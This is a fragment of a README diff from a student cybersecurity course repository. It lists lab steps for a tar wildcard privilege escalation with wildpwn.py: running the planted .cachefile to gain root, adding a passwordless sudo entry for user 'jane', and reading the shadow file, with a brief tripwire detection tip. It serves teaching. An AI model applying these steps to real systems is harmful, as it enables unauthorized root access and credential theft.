Jay-Idrees/UPenn-Cybersecurity-Archiving-and-Logging-Data/Readme.md

     - `ls -lat` this mill show the hidden files as well as display as modified by time
 - Run the python script

 - `python wildpwn.py tar .` Running the python script.
-This . is important
+This . is important.
+It is telling the script to create malacious files to listen for the tar command
+- The tar command must be run from the folder where the file is
 - `ls -lat` `cd .cache` `ls -lat` in sequence
 - `./.cachefile` running the .cachefile.
 Running this malacious script you can switch to the root user
 - `visudo` to add jane to sudoers and eliminate the need for pw - that way you do not have to steal the password. `jane   ALL=(ALL) NOPASSWD:ALL`
 - `su jane`
 - `sudo -l` you cna open shadow file, if so then you have successfully converted Jane to a super user
+- `rm -r ~/Documents/ExploitTar`

+- A software `tripwire` can alert you when users download wildpwn or when backup creat files like .cache

 ### Archiving all the files and folders in the current directory